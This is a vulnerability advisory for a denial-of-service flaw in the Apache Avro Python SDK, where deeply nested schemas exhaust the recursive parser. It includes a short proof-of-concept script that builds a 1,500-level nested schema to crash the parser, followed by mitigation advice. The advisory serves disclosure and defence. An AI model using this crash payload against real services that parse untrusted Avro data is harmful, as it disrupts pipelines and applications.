Apache Avro: Denial of Service (DoS) via Recursive Schema Parsing
Summary
The Apache Avro Python SDK is vulnerable to a Denial of Service (DoS) attack. A maliciously crafted Avro schema (.avsc) or data file (.avro) containing a deeply nested schema can trigger a RecursionError (Stack Overflow) in the Python interpreter, causing the application to crash.
Vulnerability Details
- Affected Component:
avro.schema.parseandavro.io.DatumReader. - Root Cause: The function
make_avsc_objectinavro/schema.pyuses a recursive approach to parse nested records and types. It lacks a depth limit or an iterative implementation, making it susceptible to stack exhaustion. - Attack Vector: An attacker can provide a schema with hundreds or thousands of nested records. When the application attempts to parse this schema (either directly or as part of reading an Avro data file), it will trigger a
RecursionError.
Impact
- Severity: Medium (DoS)
- Effect: Application crash. This can be used to disrupt data processing pipelines, web services, or any application that consumes untrusted Avro data or schemas.
Proof of Concept (PoC)
The following Python script generates a malicious schema and demonstrates the crash:
import avro.schema
import json
import sys
# Malicious schema with 1500 nested records
schema_str = '{"type": "record", "name": "L0", "fields": [{"name": "f", "type": "int"}]}'
for i in range(1, 1500):
schema_str = f'{{"type": "record", "name": "L{i}", "fields": [{{"name": "f", "type": {schema_str}}}]}}'
try:
# This will trigger a RecursionError in the Avro parser
avro.schema.parse(schema_str)
except RecursionError:
print("VULNERABILITY CONFIRMED: RecursionError during schema parsing!")
Mitigation
- Short-term: Implement a maximum recursion depth limit in
avro.schema.parse. - Long-term: Refactor the schema parser to use an iterative approach instead of recursion.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support